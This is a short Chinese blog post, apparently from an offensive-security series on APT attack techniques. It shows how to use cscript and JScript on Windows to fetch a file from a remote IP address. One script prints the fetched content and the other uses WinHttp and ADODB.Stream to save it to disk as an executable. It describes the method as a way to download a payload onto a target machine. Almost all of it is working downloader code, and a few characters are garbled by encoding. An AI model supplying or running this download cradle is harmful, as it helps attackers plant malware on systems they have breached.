專注APT攻擊與防御
https://micropoor.blogspot.com/
windows 全版本都會默認支持js,并且通過cscript來調(diào)用達到下載payload的目的。
靶機:windows 2003
讀取:
C:test>cscript /nologo downfile.js http://192.168.1.115/robots.txt
附代碼:
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
WScript.Echo(WinHttpReq.ResponseText);
寫入:
C:test>cscript /nologo dowfile2.js http://192.168.1.115/robots.txt
附代碼:
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe");
后者的話:簡單,易用,輕便。
Micropoor